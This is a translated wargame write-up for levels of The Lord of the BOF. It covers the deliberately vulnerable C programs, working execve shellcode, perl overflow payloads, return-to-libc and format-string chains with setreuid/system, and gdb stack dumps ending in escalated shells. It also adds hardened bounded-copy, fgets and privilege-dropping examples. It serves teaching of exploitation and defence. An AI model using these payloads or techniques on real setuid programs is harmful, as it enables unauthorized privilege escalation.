BOF 원정대 (The Lord of the BOF) redhat write-up.

Post info

Category
WarGame/The Lord Of The BOF
2013. 11. 27. 09:27

I don't have time to write this up separately, and there are so, so many good documents just a Google search away..........

so I'm just going to post the things I scribbled down while solving the problems -_-;;....


BOF 원정대 (The Lord of the BOF)


======================== [Level 1] ========================


[gate@localhost gate]$ cat gremlin.c
/*
       The Lord of the BOF : The Fellowship of the BOF
       - gremlin
       - simple BOF
*/

#include <stdio.h>    /* added: the original file has no includes (old gcc accepts implicit declarations) */
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* unbounded copy into a 256-byte stack buffer: the intended overflow */
    printf("%s\n", buffer);
}
[gate@localhost gate]$
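For reference, the fixed form of the same program. This is an added example, not part of the original post or of the wargame sources: the copy is bounded by sizeof(buffer), an over-long argv[1] is refused rather than silently truncated, and the result code tells the caller which case happened. The names copy_arg and gremlin_hardened are my own. The same strcpy(buffer, argv[1]) pattern appears in every level below (cobolt with 16 bytes, orc through troll with 40), so the same replacement applies there.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Result codes returned by copy_arg (names are this example's own). */
enum { COPY_OK = 0, COPY_NO_ARG = -1, COPY_TOO_LONG = -2 };

/*
 * Bounded replacement for strcpy(buffer, argv[1]).
 * dst_size must be the real size of dst (sizeof buffer at the call site).
 * Input longer than dst_size - 1 bytes is rejected outright rather than
 * truncated, because a silently truncated argument (a path, a command
 * line) is itself a classic source of later bugs.
 */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;

    if (dst_size == 0)
        return COPY_TOO_LONG;
    if (src == NULL) {
        dst[0] = '\0';
        return COPY_NO_ARG;
    }
    /* Scan at most dst_size bytes, so an over-long src is detected
       without walking the whole string. */
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n == dst_size) {          /* no room for the terminating NUL */
        dst[0] = '\0';
        return COPY_TOO_LONG;
    }
    memcpy(dst, src, n + 1);      /* n < dst_size, so the NUL fits */
    return COPY_OK;
}

/* Hardened equivalent of gremlin's main(): identical output for valid input,
   but an over-long argv[1] is refused instead of overwriting the saved frame
   pointer and return address that sit above buffer on the stack. */
int gremlin_hardened(int argc, char *argv[])
{
    char buffer[256];
    int rc = copy_arg(buffer, sizeof buffer, argc >= 2 ? argv[1] : NULL);

    if (rc == COPY_NO_ARG) {
        fprintf(stderr, "argv error\n");
        return 1;
    }
    if (rc == COPY_TOO_LONG) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    return gremlin_hardened(argc, argv);
}
```

Run with a 300-byte argument it prints "argument too long" and exits 1 where gremlin would have jumped to whatever sat in the overwritten return address.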



============ Solve 1.


shellcode(53byte) : "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"


53byte


0xbffff908


buf 256
sfp
ret


256-53 = 203



./gremlin "`perl -e '{print "\x90"x203,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh","\xDE\xED\xBE\xEF","\x38\xf9\xff\xbf"}'`"  


[NOP][SHELLCODE][SFP][EIP]


1. Find the start of the buffer with gdb.

2. Build the payload and fire it.

3. Clear!..



=========== Solve 2.


Solving it with RTL (return-to-libc)?

0x400a9d48 <__execve>

0x4006604c <printf>


./gremlin "`perl -e '{print "/bin/sh","\x90"x200,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh","\x44\xf9\xff\xbf","\x48\x9d\x0a\x40","\x38\xf9\xff\xbf","\xc0\xf0\xff\xbf"}'`"     


bash$ /bin/my-pass

euid = 501

hello bof world

bash$ whoami

gremlin





======================== [Level 2] ========================

[gremlin@localhost gremlin]$ cat cobolt.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - cobolt
        - small buffer
*/

#include <stdio.h>    /* added: the original file has no includes */
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* unbounded copy into a 16-byte stack buffer */
    printf("%s\n", buffer);
}
[gremlin@localhost gremlin]$




The easy way.

Register the shellcode used in Level 1 in the environment variable EGG.

Find its address with getenv.

=================== GetEnv.c Source =============
#include <stdio.h>
#include <stdlib.h>   /* added: getenv */

int main(int argc, char *argv[])
{
        char *addr;

        if(argc < 2){                          /* added: avoid getenv(NULL) */
                printf("usage: %s VARNAME\n", argv[0]);
                return 1;
        }
        addr = getenv(argv[1]);
        if(addr == NULL){                      /* added: getenv returns NULL when the variable is unset */
                printf("%s is not set\n", argv[1]);
                return 1;
        }
        printf("%s : %p\n", addr, addr);
        return 0;
}
=================================================


[Ax16][EBP][EGG address]


export EGG="`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"

./env EGG

./cobolt `perl -e '{print "A"x16,"DEAD","\x9c\xfe\xff\xbf"}'`


bash$ /bin/my-pass

euid = 502

hacking exposed

bash$ whoami

cobolt

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$




Is there a way to solve it with return-to-libc?..



int execl( const char *path, const char *arg, ...);

0x400a9ec0 <execl>

0x40058ae0 <__libc_system>

0x400391e0 <exit>

0x400a9d48 <__execve>



First, let's try it with system.


./t "`perl -e '{print "A"x16,"DEAD","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x59\xff\xff\xbf"x2}'`"

./cobolt "`perl -e '{print "A"x16,"DEAD","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x4f\xff\xff\xbf"x2}'`"



==============================================

Let's try the setuid + system combination.

Slide along a ret sled until 0x00000000 appears on the stack, call setuid so that it takes 0x00000000 as its argument, then call system.

Since the argument to system cannot be changed, create a symlink named after the string that the value on the stack points to.

Add the current directory to PATH and run the program.


./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x7a\x84\x04\x08"x5,"\x50\xa4\x0a\x40","\xe0\x8a\x05\x40"}'`"


But there's a problem. On a program without setuid it works fine, but on the setuid program an error message says the link file cannot be found.

Probably the new sh spawned by system runs under the setuid id. Hmm.;

Learned a lot, but in the end it failed.. -_-;


===============================================

Hmm.. the address obtained from env differs from the actual address... why? -_-;;...

==> The file name and argument lengths differ, so the stack layout shifts a little. Hmm.. -_-

==> The fix: if the file name is the same and the arguments are identical too, shouldn't they match? (Haven't tested it yet.)


"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xef\xbe\xed\xde","AAAA","\x56\xff\xff\xbf"x2}'`"



"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","AAAA","\x56\xff\xff\xbf"x2}'`"

"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x56\xff\xff\xbf"x2}'`"



"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x48\x9d\x0a\x40","\xe0\x91\x03\x04","\x36\xff\xff\xbf"x2}'`"


"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xc3\x9e\x0a\x40","\xe0\x91\x03\x04","\x51\xff\xff\xbf"x5}'`"




"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\x48\x9d\x0a\x40","\x4d\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"}'`"


"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\x48\x9d\x0a\x40","\x51\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"x2}'`"


"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xc3\x9e\x0a\x40","\x51\xff\xff\xbf"x1,"\xe8\x84\x04\x08"}'`"



"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe3\x8a\x05\x40","\x51\xff\xff\xbf"x1,"\xe8\x84\x04\x08"}'`"



"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\xe0\x8a\x05\x40","\x4d\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"}'`"




========= Return To LIBC ============

Normal case. execl.

[main ebp][main ret]



\x55\x89\xe5\x83\xec\x10\x83\x7d\x08\x01\x7f\x17\x68\xd0\x84\x04\x08\xe8\x0a\xff\xff\xff\x83\xc4\x04\x6a

\xf4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x83\x3d\xe8\x94\x04\x08




(gdb) x/100x $esp-0x20

0xbffffab0:     0x080484dc      0xbffffab8      0x41414141      0x41414141

0xbffffac0:     0x41414141      0x41414141      0xbffffaf8      0x41414141

0xbffffad0:     0x400aa450      0x40058ae0      0x40058ae0      0x40058ae0

0xbffffae0:     0x40058ae0      0x08048300      0x00000000      0x080483a1

0xbffffaf0:     0x08048430      0x00000002      0xbffffb14      0x080482e0

0xbffffb00:     0x080484ac      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc1a      0xbffffc23      0x00000000

0xbffffb20:     0xbffffc50      0xbffffc62      0xbffffc7a      0xbffffc99

0xbffffb30:     0xbffffcab      0xbffffccd      0xbffffcda      0xbffffe9d

0xbffffb40:     0xbffffebc      0xbffffec9      0xbffffee6      0xbffffefb

0xbffffb50:     0xbfffff1a      0xbfffff25      0xbfffff35      0xbfffff3d

0xbffffb60:     0xbfffff47      0xbfffff58      0xbfffff66      0xbfffff74

0xbffffb70:     0xbfffff85      0xbfffff90      0xbfffffa3      0xbfffffe8

0xbffffb80:     0x00000000      0x00000003      0x08048034      0x00000004

0xbffffb90:     0x00000020      0x00000005      0x00000006      0x00000006

0xbffffba0:     0x00001000      0x00000007      0x40000000      0x00000008

0xbffffbb0:     0x00000000      0x00000009      0x08048380      0x0000000b

0xbffffbc0:     0x000001f5      0x0000000c      0x000001f5      0x0000000d


$1 = {int (char *, char *)} 0x400660a0 <sprintf>

$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

$3 = {<text variable, no debug info>} 0x400aa450 <__setuid>


[gremlin@localhost gremlin]$ ./envvvv FMT

%2$n?@ : 0xbffffec0

[gremlin@localhost gremlin]$ ./envvvv SHELL

/bin/bash2 : 0xbfffff4d


./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x7a\x84\x04\x08"x5,"\x50\xa4\x0a\x40","\xe0\x8a\x05\x40"}'`"


./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x4d\xff\xff\xbf","\xd8\xfa\xff\xbf"}'`"


(gdb) x/100x $esp-0x20

0xbffffaa0:     0x080484dc      0xbffffaa8      0x41414141      0x41414141

0xbffffab0:     0x41414141      0x41414141      0xbffffaf8      0x42424242

0xbffffac0:     0x400aa450      0xbffffad8      0xbffffec0      0xbfffff4d

0xbffffad0:     0xbffffffc      0x08048300      0x00000000      0x080483a1

0xbffffae0:     0x08048430      0x00000002      0xbffffb04      0x080482e0

0xbffffaf0:     0x080484ac      0x4000ae60      0xbffffafc      0x40013e90

0xbffffb00:     0x00000002      0xbffffc0e      0xbffffc17      0x00000000

0xbffffb10:     0xbffffc44      0xbffffc56      0xbffffc6e      0xbffffc8d

0xbffffb20:     0xbffffcab      0xbffffccd      0xbffffcda      0xbffffe9d

0xbffffb30:     0xbffffebc      0xbffffec9      0xbffffee6      0xbffffefb

0xbffffb40:     0xbfffff1a      0xbfffff25      0xbfffff35      0xbfffff3d






[gremlin@localhost gremlin]$ ./envvvv MYSHELL

/tmp/myshell : 0xbffffc9e

[gremlin@localhost gremlin]$ ./envvvv FMT   

%2$n?@ : 0xbffffec0

[gremlin@localhost gremlin]$




(gdb) x/100x $esp-0x20

0xbffffab0:     0x080484dc      0xbffffab8      0x41414141      0x41414141

0xbffffac0:     0x41414141      0x41414141      0xbffffaf8      0x42424242

0xbffffad0:     0x400aa450      0xbffffad8      0xbffffec0      0xbfffff4d

0xbffffae0:     0xbffffffc      0x08048300      0x00000000      0x080483a1

0xbffffaf0:     0x08048430      0x00000002      0xbffffb14      0x080482e0

0xbffffb00:     0x080484ac      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc17      0xbffffc20      0x00000000

0xbffffb20:     0xbffffc4d      0xbffffc5f      0xbffffc77      0xbffffc96

0xbffffb30:     0xbffffcab      0xbffffccd      0xbffffcda      0xbffffe9d

0xbffffb40:     0xbffffebc      0xbffffec9      0xbffffee6      0xbffffefb

0xbffffb50:     0xbfffff1a      0xbfffff25      0xbfffff35      0xbfffff3d

0xbffffb60:     0xbfffff47      0xbfffff58      0xbfffff66      0xbfffff74

0xbffffb70:     0xbfffff85      0xbfffff90      0xbfffffa3      0xbfffffe8

0xbffffb80:     0x00000000      0x00000003      0x08048034      0x00000004

0xbffffb90:     0x00000020      0x00000005      0x00000006      0x00000006

0xbffffba0:     0x00001000      0x00000007      0x40000000      0x00000008






[gremlin@localhost gremlin]$ ./cobolt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x9e\xfc\xff\xbf","\xd8\xfa\xff\xbf"}'`" 

AAAAAAAAAAAAAAAA表퓼`@P?

                          @喇오?퓹?왠??

                                            bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ ls

ls: .: Permission denied

bash$ /bin/my-pass

euid = 502

hacking exposed

bash$







"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x9e\xfc\xff\xbf"x2}'`"




[gremlin@localhost gremlin]$ export FMT="%2\$n%3\$n`printf "\xe0\x8a\x05\x40"`"

[gremlin@localhost gremlin]$

[gremlin@localhost gremlin]$

[gremlin@localhost gremlin]$

[gremlin@localhost gremlin]$ ./envvvv FMT

%2$n%3$n?@ : 0xbffffebc

[gremlin@localhost gremlin]$ ./envvvv SHELL

/bin/bash2 : 0xbfffff4d

[gremlin@localhost gremlin]$


[gremlin@localhost gremlin]$ ./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","AAAA","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x4d\xff\xff\xbf","\xd8\xfa\xff\xbf"x2}'`"                     

AAAAAAAAAAAAAAAA表풞AAAP?

                           @喇오?풫왠?왠??

                                                 Segmentation fault (core dumped)

[gremlin@localhost gremlin]$ gdb ./tttttt core

GNU gdb 19991004

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

Core was generated by `./tttttt AAAAAAAAAAAAAAAA表풞AAAP?

                                                           @喇오?풫왠?왠??.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x41414141 in ?? ()

(gdb) x/100x %esp-0x20

A parse error in expression, near `esp-0x20'.

(gdb) x/100x $esp-0x20

0xbffffaa0:     0x080484dc      0xbffffaa8      0x41414141      0x41414141

0xbffffab0:     0x41414141      0x41414141      0xbffffaf8      0x41414141

0xbffffac0:     0x400aa450      0xbffffad4      0xbffffec0      0xbfffff4d

0xbffffad0:     0xbffffad8      0xbffffad8      0x00000000      0x080483a1

0xbffffae0:     0x08048430      0x00000002      0xbffffb04      0x080482e0

0xbffffaf0:     0x080484ac      0x4000ae60      0xbffffafc      0x40013e90

0xbffffb00:     0x00000002      0xbffffc0f      0xbffffc18      0x00000000

0xbffffb10:     0xbffffc49      0xbffffc5b      0xbffffc73      0xbffffc92

0xbffffb20:     0xbffffca7      0xbffffcc9      0xbffffcd6      0xbffffe99

0xbffffb30:     0xbffffeb8      0xbffffec9      0xbffffee6      0xbffffefb

0xbffffb40:     0xbfffff1a      0xbfffff25      0xbfffff35      0xbfffff3d

0xbffffb50:     0xbfffff47      0xbfffff58      0xbfffff66      0xbfffff74

0xbffffb60:     0xbfffff85      0xbfffff90      0xbfffffa3      0xbfffffe8

0xbffffb70:     0x00000000      0x00000003      0x08048034      0x00000004

0xbffffb80:     0x00000020      0x00000005      0x00000006      0x00000006

0xbffffb90:     0x00001000      0x00000007      0x40000000      0x00000008

0xbffffba0:     0x00000000      0x00000009      0x08048380      0x0000000b

0xbffffbb0:     0x000001f5      0x0000000c      0x000001f5      0x0000000d

0xbffffbc0:     0x000001f5      0x0000000e      0x000001f5      0x00000010

0xbffffbd0:     0x0fabfbff      0x0000000f      0xbffffc0a      0x00000000



"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xc4\xfa\xff\xbf","\xbc\xfe\xff\xbf","\x4d\xff\xff\xbf","\xc8\xfa\xff\xbf","\xcc\xfa\xff\xbf"}'`"













=====


$1 = {int (char *)} 0x4006604c <printf>

0x400a9ec0 <execl>



[gremlin@localhost gremlin]$ ./envvvv FMT

%3$n : 0xbffffec4

[gremlin@localhost gremlin]$ ./envvvv SHELL

/bin/bash2 : 0xbfffff4d

[gremlin@localhost gremlin]$


"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\xc0\x9e\x0a\x40","\xc4\xfe\xff\xbf","\x4d\xff\xff\xbf","\x4d\xff\xff\xbf","\xe0\xfa\xff\xbf"}'`"



Hmm.. after a lot of fumbling around...

setuid does not change the uid.



(gdb) x/100x $esp-0x20

0xbffffab0:     0x080484dc      0xbffffab8      0x41414141      0x41414141

0xbffffac0:     0x41414141      0x41414141      0xbffffaf8      0x41414141

0xbffffad0:     0x400a9ec0      0xbffffec4      0xbfffff4d      0xbfffff4d

0xbffffae0:     0xbffffacc      0x08048300      0x00000000      0x080483a1

0xbffffaf0:     0x08048430      0x00000002      0xbffffb14      0x080482e0

0xbffffb00:     0x080484ac      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc1b      0xbffffc24      0x00000000

0xbffffb20:     0xbffffc51      0xbffffc63      0xbffffc7b      0xbffffc9a

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcde      0xbffffea1

0xbffffb40:     0xbffffec0      0xbffffec9      0xbffffee6      0xbffffefb

0xbffffb50:     0xbfffff1a      0xbfffff25      0xbfffff35      0xbfffff3d

0xbffffb60:     0xbfffff47      0xbfffff58      0xbfffff66      0xbfffff74

0xbffffb70:     0xbfffff85      0xbfffff90      0xbfffffa3      0xbfffffe8

0xbffffb80:     0x00000000      0x00000003      0x08048034      0x00000004

0xbffffb90:     0x00000020      0x00000005      0x00000006      0x00000006



Hmm.............

Results of some trial and error.


First, a binary that is setuid root behaves somewhat differently from one owned by a regular user.

When calling setuid, the exact id value must be supplied.

setuid doesn't do it; setreuid has to be executed.

Once setreuid works, system works too.


Without setreuid, neither system nor execl works.


Does euid only change through setreuid?....


Ah.. nothing is clear.. ㅡㅡ;;
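What is being puzzled over above is the POSIX saved set-user-id: in a non-root setuid program, setuid() changes only the effective uid and leaves the saved uid where it was, while setreuid() with a new real uid overwrites the saved uid as well. The defensive consequence is how such a program should drop its privileges. This is an added example, not part of the original post: drop_privileges() uses setreuid so that the elevated uid cannot be re-acquired later in the same process (which is exactly what a libc call chain injected into the process relies on), and privileges_dropped() verifies it. Both function names are my own. Run as an ordinary user there is nothing to drop and it reports dropped=1 trivially; installed setuid it shows the real effect.

```c
#define _XOPEN_SOURCE 700   /* declares setreuid/seteuid under strict -std modes */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/*
 * Permanently give up a setuid binary's elevated effective uid.
 * setuid(getuid()) is not enough for a non-root setuid program: it changes
 * only the effective uid and leaves the saved set-user-id in place, so the
 * privilege can be re-acquired with seteuid() later.  setreuid(uid, uid)
 * also overwrites the saved set-user-id, closing that door.
 * Returns 0 on success, -1 on failure.
 */
int drop_privileges(void)
{
    uid_t real = getuid();

    if (setreuid(real, real) != 0)
        return -1;
    /* Never trust the call alone: confirm the effective uid really changed. */
    if (geteuid() != real)
        return -1;
    return 0;
}

/*
 * 1 if no elevated uid remains reachable in this process: the effective uid
 * equals the real uid and switching back to old_euid fails.  When old_euid
 * already equals the real uid there was nothing to drop, which counts as
 * dropped.  Returns 0 if the old privilege can still be regained.
 */
int privileges_dropped(uid_t old_euid)
{
    uid_t real = getuid();

    if (geteuid() != real)
        return 0;
    if (old_euid == real)
        return 1;
    if (seteuid(old_euid) == 0) {
        /* Re-elevation worked, so the saved uid was still there; undo it. */
        seteuid(real);
        return 0;
    }
    return 1;
}

int main(void)
{
    uid_t old_euid = geteuid();

    if (drop_privileges() != 0) {
        perror("setreuid");
        return 1;
    }
    printf("uid=%u euid=%u dropped=%d\n",
           (unsigned)getuid(), (unsigned)geteuid(), privileges_dropped(old_euid));
    return 0;
}
```

Note that for a setuid-root program setuid(getuid()) does clear all three ids; the asymmetry above is specific to setuid binaries owned by a non-root user such as cobolt (uid 502), which is the case in this level.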



$1 = {<text variable, no debug info>} 0x400c4e20 <__setreuid>

$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>


[BUF][SFP][printf][pop-ret][FMT(%3$n%4$n)][setreuid][pop-pop-ret][selfaddr][selfaddr][system][AAAA][/bin/sh]


0x0005b5f1 madd al, ch ; pop ebp ; ret  ;  (1 found)



[gremlin@localhost gremlin]$ ./envvvv FMT

%3$n%4$n : 0xbffffe8c

[gremlin@localhost gremlin]$ ./envvvv SHELL

/bin/bash2 : 0xbfffff3c


(gdb) x/100x $esp-0x20

0xbffffa60:     0x080484dc      0xbffffa68      0x41414141      0x41414141

0xbffffa70:     0x41414141      0x41414141      0xbffffaf8      0x42424242

0xbffffa80:     0x400cc104      0xbffffec4      0x400c4e20      0x400cc103

0xbffffa90:     0xbffffae0      0xbffffae0      0x40058ae0      0x41414141

0xbffffaa0:     0xbfffff19      0x00000000      0xbffffac4      0x080482e0

0xbffffab0:     0x080484ac      0x4000ae60      0xbffffabc      0x40013e90

0xbffffac0:     0x00000002      0xbffffbd3      0xbffffbdc      0x00000000

0xbffffad0:     0xbffffc19      0xbffffc2b      0xbffffc43      0xbffffc62

0xbffffae0:     0xbffffc77      0xbffffc99      0xbffffca6      0xbffffe69

0xbffffaf0:     0xbffffe88      0xbffffe95      0xbffffeb2      0xbffffec7

0xbffffb00:     0xbffffeea      0xbfffff09      0xbfffff14      0xbfffff24

0xbffffb10:     0xbfffff2c      0xbfffff36      0xbfffff47      0xbfffff55

0xbffffb20:     0xbfffff63      0xbfffff74      0xbfffff7f      0xbfffff92

0xbffffb30:     0xbfffffa3      0xbfffffe8      0x00000000      0x00000003

0xbffffb40:     0x08048034      0x00000004      0x00000020      0x00000005

0xbffffb50:     0x00000006      0x00000006      0x00001000      0x00000007

0xbffffb60:     0x40000000      0x00000008      0x00000000      0x00000009

0xbffffb70:     0x08048380      0x0000000b      0x000001f5      0x0000000c

0xbffffb80:     0x000001f5      0x0000000d      0x000001f5      0x0000000e

0xbffffb90:     0x000001f5      0x00000010      0x0fabfbff      0x0000000f

0xbffffba0:     0xbffffbce      0x00000000      0x00000000      0x00000000

0xbffffbb0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffbc0:     0x00000000      0x00000000      0x00000000      0x36690000


[gremlin@localhost gremlin]$ ./envvvv FMT 

%502d%3$n%4$n : 0xbffffe87

[gremlin@localhost gremlin]$ ./envvvv SHELL

/bin/bash2 : 0xbfffff3c


pop-ret : 0x400cc104

pop-pop-ret : 0x400cc103

                   [BUF]  [SFP]             [printf]            [pop-ret]         [FMT(%3$n%4$n)]    [setreuid]         [pop-pop-ret]      [selfaddr]         [selfaddr]         [system]             [AAAA]  [/bin/sh]

"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\x87\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\x90\xfa\xff\xbf","\x94\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x3c\xff\xff\xbf"}'`"


[gremlin@localhost gremlin]$ ./cobolt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\x87\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\x90\xfa\xff\xbf","\x94\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x3c\xff\xff\xbf"}'`"

AAAAAAAAAAAAAAAA表풪`@?@뉮?N

                                @?@멁퓭?욈?@AAAA<?

                                                         bash2-2.03$ id

uid=502(cobolt) gid=501(gremlin) groups=501(gremlin)

bash2-2.03$ /bin/my-pass

euid = 502

hacking exposed

bash2-2.03$

cobolt




=====================================================================================

[cobolt@localhost cobolt]$ cat goblin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - goblin
        - small buffer + stdin
*/

#include <stdio.h>    /* added: the original file has no includes */

int main()
{
    char buffer[16];
    gets(buffer);              /* gets() has no length bound at all; removed from C11 */
    printf("%s\n", buffer);
}
[cobolt@localhost cobolt]$
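goblin reads with gets(), which has no length argument at all. As an added example (not from the post or the wargame sources), the bounded replacement: fgets into sizeof(buffer), the newline stripped as gets() did, and an over-long line reported and drained so that the next read starts at the next line rather than in the middle of the rejected one. The names read_line, stream_of and goblin_hardened are mine; the input strings in main are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

enum { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 };

/*
 * Bounded replacement for gets(buffer).  Reads one line from `in` into dst
 * (dst_size bytes including the terminating NUL).  A line that does not fit
 * is reported as LINE_TOO_LONG and the rest of it is discarded.
 */
int read_line(FILE *in, char *dst, size_t dst_size)
{
    size_t len;
    int c;

    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return LINE_EOF;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';          /* strip the newline, as gets() did */
        return LINE_OK;
    }
    /* No newline in dst: the buffer filled exactly, the input ended without
       a newline, or the line is too long.  Peek one byte to tell them apart. */
    c = fgetc(in);
    if (c == EOF || c == '\n')
        return LINE_OK;               /* the line fit exactly */
    while (c != '\n' && c != EOF)     /* over-long: drain the remainder */
        c = fgetc(in);
    dst[0] = '\0';
    return LINE_TOO_LONG;
}

/* Hardened equivalent of goblin's main(), reading from any stream. */
int goblin_hardened(FILE *in)
{
    char buffer[16];
    int rc = read_line(in, buffer, sizeof buffer);

    if (rc != LINE_OK) {
        fputs(rc == LINE_EOF ? "no input\n" : "input too long\n", stderr);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}

/* Demo helper: a FILE* holding `text`, built with tmpfile() so it is plain C. */
FILE *stream_of(const char *text)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(text, f);
    rewind(f);
    return f;
}

int main(void)
{
    /* Constructed inputs: a short line, and a 24-byte line that would have
       overrun goblin's 16-byte buffer. */
    FILE *ok = stream_of("id\n");
    FILE *bad = stream_of("AAAAAAAAAAAAAAAABBBBCCCC\n");
    int r1 = goblin_hardened(ok);
    int r2 = goblin_hardened(bad);
    fclose(ok);
    fclose(bad);
    return r1 == 0 && r2 == 1 ? 0 : 1;
}
```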



[cobolt@localhost cobolt]$ ./envvvv EGG

1?方??^?핂F덯    N?1???汪/bin/sh : 0xbffffe9b


[cobolt@localhost cobolt]$ (perl -e '{print "A"x16, "B"x4, "\x9b\xfe\xff\xbf"}';cat)  | ./goblin

id

AAAAAAAAAAAAAAAABBBBd

id

uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)

/bin/my-pass

euid = 503

hackers proof


id

uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)

whoami

goblin






====================================================================================


[goblin@localhost goblin]$ cat orc.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added: memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

